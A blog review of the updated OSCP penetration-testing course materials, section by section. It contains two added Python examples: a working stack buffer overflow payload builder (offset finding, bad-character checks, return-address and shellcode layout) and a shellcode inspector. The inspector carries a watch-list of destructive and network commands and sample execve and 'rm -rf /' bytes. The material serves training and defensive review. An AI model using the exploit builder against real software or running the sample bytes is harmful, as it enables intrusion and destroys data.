Updated OSCP Materials: Part Three

Moving on to the third (and last) section of my review of the revised OSCP materials. There was a huge amount of content to go through, so this took some time. This article starts with the web attacks section and runs to the very end. This is mostly a review of the narrated modules, though the PDF is very similar and is great for cutting out code snippets for later use, unless you're like me and find some joy in retyping everything.

Web application attacks; holy cow, this section has improved dramatically! “DIRBEE?!” When all this time I have been pronouncing it DIRB! The web application attack section is guided by the OWASP methodology and provides much better explanations of terminology and concepts. You’ll find a deeper dive into web applications than previously, and the modules have greatly improved over their previous version. There is an excellent review of inspecting web pages and the developer tools available in Firefox, and excellent coverage of Burp Suite and Intruder. XSS is explained well, as is session/cookie compromise. The LFI/RFI and log file poisoning modules are also very good, with great practical applications.

The SQL injection module is good, with some nice, subtle humor, and an excellent walkthrough of tools and techniques that runs from enumeration all the way to code execution via SQL injection. “ESSCUELL”? I WAS pronouncing it that way, but ended up moving to saying “sequel” after receiving some raised eyebrows. There are some great practical exercises with sqlmap as well, which will certainly help you out.

The Buffer Overflow module is very in-depth, with a great walkthrough of the stack and its naming conventions to build a basic understanding. Navigating the code may be a bit confusing for those with no programming or assembly knowledge, but it ultimately walks you through the overflow, which makes the terminology and behaviors make much more sense. No more SLMail walkthrough! There is a new application, with a vulnerability found in 2017. This version has a much better explanation of HOW you begin identifying and crafting exploits, and it introduces a newer, more relevant fuzzing tool. The Linux BO review includes some excellent concepts and methods, as well as showing you new ways to craft your exploits.
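
To make the "how you begin identifying and crafting" part concrete, here is an added example of my own (not code from the course materials) covering the arithmetic behind the stack overflow walkthrough: a cyclic pattern to locate the offset at which the saved return address is overwritten, a bad-character string and a compare routine for the bytes the target mangles, and assembly of the final buffer around the overwrite. The crashed EIP value 0x61413361, the JMP ESP address 0x625011af, and the four INT3 bytes standing in for shellcode are all constructed for the example; nothing here comes from a real target.

```python
"""
Added example (not from the OSCP course materials): cyclic pattern, offset
lookup, bad-character comparison and payload layout for a classic x86 stack
overflow. All sample values are constructed for illustration.
"""
import string
import struct
from typing import Optional

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes before it repeats


def cyclic_pattern(length: int) -> bytes:
    """Build the 'Aa0Aa1Aa2...' pattern; within MAX_PATTERN every 4-byte window occurs once."""
    if length > MAX_PATTERN:
        raise ValueError(f"pattern longer than {MAX_PATTERN} bytes would repeat")
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value, length: int = MAX_PATTERN) -> Optional[int]:
    """Map the value a debugger shows in EIP (or 4 bytes read from memory) to its
    offset in the pattern. Ints are converted little-endian, which is how an x86
    register reads back the bytes that were written over the saved return address."""
    if isinstance(value, int):
        size = 4 if value <= 0xFFFFFFFF else 8
        needle = value.to_bytes(size, "little")
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    idx = cyclic_pattern(length).find(needle)
    return None if idx == -1 else idx


def badchar_string(exclude=(0x00,)) -> bytes:
    """Every byte value except the ones already known to be bad (0x00 for a
    string-copy bug); sent after the overwrite and then read back in the debugger."""
    return bytes(b for b in range(256) if b not in exclude)


def first_corrupted_byte(sent: bytes, seen: bytes):
    """Compare what was sent with what landed in memory. Returns (index, byte) for
    the first byte that was altered or truncated, or None if all survived. Add that
    byte to `exclude` and repeat: later mismatches are often side effects of the first."""
    for i, (a, b) in enumerate(zip(sent, seen)):
        if a != b:
            return i, a
    if len(seen) < len(sent):
        return len(seen), sent[len(seen)]
    return None


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  total: Optional[int] = None, nops: int = 16) -> bytes:
    """padding | return address (little-endian, e.g. a JMP ESP gadget) | NOP sled | shellcode.
    `total` pads to the original crash length so the bug is triggered the same way."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode
    if total is not None:
        if len(buf) > total:
            raise ValueError("payload does not fit in the crash buffer")
        buf += b"C" * (total - len(buf))
    return buf


if __name__ == "__main__":
    # Constructed: EIP reads 0x61413361 after the pattern overwrote it.
    print("offset:", pattern_offset(0x61413361))  # 10
    sent = badchar_string()
    seen = sent[:9]  # constructed: the target truncated the input at 0x0a (newline)
    print("first bad char:", first_corrupted_byte(sent, seen))
    # Constructed: 0x625011af stands in for a JMP ESP found in a non-ASLR module.
    payload = build_payload(10, 0x625011af, b"\xcc" * 4, total=64)
    print("payload:", payload.hex())
```

The offset lookup is the same idea as pattern_create/pattern_offset (or mona's findmsp): because no 4-byte window repeats, the four bytes in EIP identify exactly where in the input they came from. Run the bad-character step until `first_corrupted_byte` returns None, then build the final buffer.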

Client-side attacks include some great social engineering examples and an excellent client fingerprinting module, with a good walkthrough of modifying and using fingerprinting applications. The course materials also provide a solid update on Microsoft IE, Edge, and MS Office attacks, with an especially good review of macro attacks.

The new courseware provides a few new tricks and resources for finding and using publicly available exploits, including the old warning about shellcode in a public exploit that does something other than what it claims (the classic hidden “rm -rf” buried in supposed JMP code). Great review of SearchSploit and nmap NSE scripts, and of BeEF and its capabilities. There is also a good walkthrough of how one would move from recon to exploit research to exploit execution.
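
Since that warning is the one practitioners most often skip, here is an added example of my own (not code from the course or from any real exploit) of the pre-flight check to run on shellcode copied out of a public exploit before it ever executes on your box. It parses the usual "\x31\xc0..." literal into bytes, pulls out readable strings, reassembles strings that were built four bytes at a time with push instructions (the standard trick for avoiding NUL bytes), and flags tokens that have no business in what claims to be a bind shell. The sample exploit text, its "bind shell" claim and the watch-list are all constructed for the example.

```python
"""
Added example (not from the OSCP course materials): inspect shellcode lifted
from a public exploit before running it. SAMPLE_EXPLOIT and SUSPICIOUS are
constructed for illustration.
"""
import hashlib
import re

# Constructed watch-list: tokens worth a second look before anything executes.
SUSPICIOUS = (b"rm -rf", b"/bin/sh", b"/bin/bash", b"/etc/passwd",
              b"/etc/shadow", b"wget ", b"curl ", b"chmod ", b"nc ")

# Constructed sample: a file claiming to carry a bind shell, whose bytes are the
# classic 23-byte Linux x86 execve("/bin//sh") stub followed by "rm -rf /".
SAMPLE_EXPLOIT = r'''
/* bind shell, port 4444 (claimed) */
unsigned char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
"\x72\x6d\x20\x2d\x72\x66\x20\x2f\x00";
'''


def parse_c_escaped(src: str) -> bytes:
    """Collect every \\xNN escape in a C/Python/Perl-style literal into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", src))


def printable_strings(data: bytes, min_len: int = 4):
    """Same idea as strings(1): runs of printable ASCII at least min_len long."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def pushed_strings(data: bytes):
    """Heuristic: NUL-free shellcode pushes a string four bytes at a time with
    `push imm32` (opcode 0x68), last chunk first. Reassemble consecutive pushes so
    "/bin//sh" shows up even though it never appears contiguously in the bytes."""
    found, i = [], 0
    while i < len(data):
        chunks = []
        while i + 5 <= len(data) and data[i] == 0x68:
            chunks.append(data[i + 1:i + 5])
            i += 5
        if not chunks:
            i += 1
            continue
        s = b"".join(reversed(chunks)).rstrip(b"\x00")
        if s and all(0x20 <= b < 0x7F for b in s):
            found.append(s.decode("ascii"))
    return found


def find_suspicious(data: bytes, extra_strings=()):
    """Match the watch-list against the raw bytes plus any reassembled strings,
    with repeated slashes collapsed so "/bin//sh" is caught as "/bin/sh"."""
    blob = b"\n".join([data] + [s.encode("ascii") for s in extra_strings])
    blob = re.sub(rb"/+", b"/", blob)
    return sorted(t.decode("ascii") for t in SUSPICIOUS if t in blob)


def inspect_shellcode(src: str) -> dict:
    """Full report for one exploit file's shellcode literal."""
    data = parse_c_escaped(src)
    pushed = pushed_strings(data)
    return {
        "length": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "null_bytes": data.count(0),
        "strings": printable_strings(data),
        "pushed_strings": pushed,
        "suspicious": find_suspicious(data, pushed),
    }


if __name__ == "__main__":
    report = inspect_shellcode(SAMPLE_EXPLOIT)
    for key, value in report.items():
        print(f"{key:>15}: {value}")
    if report["suspicious"]:
        print("do NOT run this as-is; disassemble it and read it first")
```

A clean string scan alone misses the execve stub, because "/bin" and "//sh" are pushed in reverse order; the reassembly step is what surfaces it. Treat any hit as a reason to disassemble the bytes, not as a verdict either way: a watch-list is a tripwire, and a careful author can hide the same behavior behind arithmetic that no string scan will see.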

The new courseware has a great review of how to fix exploits and how to alter them to suit your particular needs. Memory corruption and web exploits are both covered in detail, there is a good review of cross-compilation techniques, and the troubleshooting section is excellent.

Great fieldwork guidance on transferring attack tools, going beyond the simple CTF-style lab considerations. Good explanation of non-interactive shells and your options with them, and great examples of file transfer methods. Fileless exploits are also covered, along with other useful tools. Some examples moved a little too quickly, but that’s why you have the PDF! The AV evasion and privilege escalation sections are also very well done, and the password attacks module has been expanded.

Port forwarding has been greatly improved, with a much deeper explanation and demonstrations of many of the tools you will use. This section is far more detailed than in the old course material.

Very involved module on AD attacks; any field consultant will recognize many of the techniques used, and even seasoned pen testers will learn a new thing or two. Excellent coverage of both NTLM and Kerberos attack methodologies, lateral movement, and clever implementations of both.

For Metasploit, there’s a great walkthrough of the MSF functionality. You’ll very likely pick up a few tricks that you might not have known before, with excellent explanations of many functions and customizations you might not have used, including how to craft your own MSF module.

A new section was added covering PowerShell Empire, with a great walkthrough of a very useful tool, as well as ways it can be used in conjunction with MSF.

Finally, the modules end with a walkthrough of a full penetration test, from initial enumeration to domain compromise. Overall very good, but some of the steps were either somewhat unintuitive or required some firsthand knowledge of the scenario, since they easily could have gone awry without knowing the issues beforehand; there were several points with a certain degree of guesswork/ambiguity. THIS is where you’ll find yourself chasing rabbits down the rabbit hole and being stuck for hours on a false lead. That said, there are a few cases during the walkthrough where the tester also encountered failure and was forced to backtrack.

I do believe this is one of the harder things to teach effectively, because each scenario is different, and really, in their defense, it takes a certain attention to clues, intuition, and the ability to keep hammering away despite it being a rabbit hole in order to be effective. We can all be tripped up by missing the obvious, missing the not-so-obvious, or needing a crash course in some proprietary software we’ve never worked with before. All things considered, however, it is a great example of how one moves through the steps from initial enumeration, through multiple machines and challenges, to domain administrator.

What I have noticed in the new material is much better explanation of things, rather than the old “give them a rough sketch and let them figure out the rest”, so the courseware is far more self-sufficient in guiding you. I did find it interesting that the Impacket suite of tools, as well as Responder, was absent from the modules. Overall, the new materials are definitely worth looking into, even if you've already taken the old course.

Scott Zangraft

Security Automation & Cybersecurity Engineering | SIEM & Security Tooling Optimization | Risk & Compliance Management

4 years ago

David Ethington, Thanks for sharing your guide on the updated OSCP materials. I was on the fence about getting it but after reading these definitely going to get it now.
